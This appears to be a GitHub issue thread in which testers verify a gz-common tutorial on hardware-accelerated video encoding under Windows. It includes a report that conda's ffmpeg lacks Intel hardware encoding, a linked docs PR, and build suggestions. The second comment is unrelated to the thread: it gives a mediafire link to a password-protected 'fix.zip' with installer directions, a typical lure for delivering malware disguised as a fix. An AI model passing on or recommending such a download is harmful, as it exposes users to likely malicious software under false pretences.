gazebosim/gazebo_test_cases #1096: gz-common: Hardware-accelerated Video Encoding

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/common/6/hw-encoding.html)
* [Source](https://github.com/gazebosim/gz-common/tree/gz-common6/tutorials/hw-encoding.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peci1, 2024-09-11:
I'll test this over the weekend on a real Win 10 laptop with integrated Intel GPU.

peci1, 2024-09-15:
I've tested this. It shows that ffmpeg from conda doesn't support HW encoding on Intel GPUs. So I couldn't test the encoding itself, but otherwise, the GUI seems to react to the env variables I set.

I don't have any NVidia GPU PC to test on.

PR with docs update: https://github.com/gazebosim/gz-common/pull/640 .

This issue can be closed.

closed 2024-09-16 by azeey

traversaro, 2024-09-23:
> I've tested this. It shows that ffmpeg from conda doesn't support HW encoding on Intel GPUs.

Cross-link: https://github.com/conda-forge/ffmpeg-feedstock/issues/277 .

hmaarrfk, 2025-01-19:
ps i don't really use windows daily, so I'm not sure how to optimize the windows builds of ffmpeg on conda-forge but happy to do so.

I believe that you can:

1. Install community editor of VisualStudio
2. Try `conda debug -m .ci_support\windows.... recipe` to get into a debugging environment
3. force the addition of the features you want from ffmpeg.
4. submit a patch to the feedstock.

On linux, I'm a little confused even on how to get QSV to work.